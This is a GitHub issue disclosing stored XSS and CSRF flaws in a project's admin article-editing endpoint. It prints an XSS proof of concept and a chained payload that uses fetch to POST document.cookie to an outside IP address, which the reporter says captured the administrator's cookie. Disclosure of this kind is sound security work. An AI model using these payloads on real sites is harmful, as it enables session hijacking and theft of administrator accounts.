Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS and CSRF exist in the background article editing #102

Open
Catherines77 opened this issue Dec 23, 2024 · 0 comments
Open

XSS and CSRF exist in the background article editing #102

Catherines77 opened this issue Dec 23, 2024 · 0 comments

Comments

@Catherines77
Copy link

Stored XSS in the administrator backend article editing

interface: /admin/article/editSubmit
XSS POC: <img src=1 onerror=alert(document.cookie)>
image
image

CSRF in the administrator backend article editing

interface: /admin/article/editSubmit
CSRF POC: generated by burpsuite
image
image

Combining two vulnerabilities

Change the articleContent parameter content to XSS EXP
XSS EXP: <script>fetch('http://192.168.239.129:8080', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>
View or edit this article
image
Got the administrator cookie
image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant